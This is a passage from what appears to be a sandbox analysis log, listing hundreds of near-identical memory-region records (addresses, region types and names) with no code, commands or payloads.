pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11345 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11346 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11347 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11348 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11349 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11350 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11351 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11352 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11353 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11354 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11355 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11356 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11357 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11358 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11359 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11360 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11361 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11362 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11363 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11364 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11365 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11366 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11367 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11368 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11369 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11370 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11371 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11372 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11373 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11374 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11375 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 11376 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 11377 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11378 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11379 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11380 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11381 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11382 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11383 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11384 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11385 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11386 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11387 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11388 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11389 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 11390 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 11391 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11392 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11393 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 11394 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 11395 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11396 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11397 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11398 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11399 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11400 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11401 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11402 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11403 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11404 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11405 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11406 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11407 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11408 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11409 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11410 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11411 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11412 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11413 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11414 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11415 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11416 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11417 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11418 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11419 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11420 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11421 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11422 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11423 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11424 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11425 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11426 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11427 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11428 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11429 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11430 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11431 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11432 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11433 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11434 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11435 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11436 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11437 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11438 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11439 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11440 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11441 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11442 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11443 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11444 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11445 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11446 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11447 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11448 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11449 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11450 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11451 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11452 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11453 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11454 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11455 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11456 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11457 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11458 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11459 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11460 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11461 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11462 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11463 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11464 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11465 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11466 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11467 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 11468 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 11469 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11470 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11471 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11472 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11473 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11474 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11475 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11476 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11477 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11478 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11479 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11480 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11481 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11482 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11483 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11484 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11485 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11486 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11487 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11488 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11489 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11490 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11491 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11492 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11493 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11494 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11495 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11496 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11497 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11498 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11499 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11500 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11501 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11502 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11503 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11504 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 11505 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 11506 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11507 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11508 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 11509 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 11510 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11511 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11512 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11513 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11514 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11515 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11516 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11517 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11518 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11519 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11520 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11521 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11522 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11523 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11524 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11525 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11526 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11527 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 11528 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 11529 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11530 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11531 start_va = 0x610000 end_va 